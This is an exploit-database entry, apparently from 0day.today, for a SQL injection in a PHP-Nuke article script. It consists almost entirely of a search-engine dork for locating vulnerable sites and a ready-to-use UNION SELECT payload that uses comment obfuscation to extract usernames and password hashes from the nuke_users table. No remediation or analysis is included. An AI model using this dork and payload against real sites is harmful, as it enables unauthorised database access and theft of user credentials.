id: 10467
date: 12/27/2009
title: Nuke Remote SQL Injection Vulnerability
author: FormatXFormaT
cves: 

=======================================
Nuke Remote SQL Injection Vulnerability
=======================================

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=
 
Dork:
article.php?sid=
 
=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=
 
Exploit:
/**/union/**/all/**/select/**/1,2,3,4,concat(uname,0x3e,pass),6,7,8,9,10,11+from+nuke_users--
 
=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=



#  0day.today [2023-03-21]  #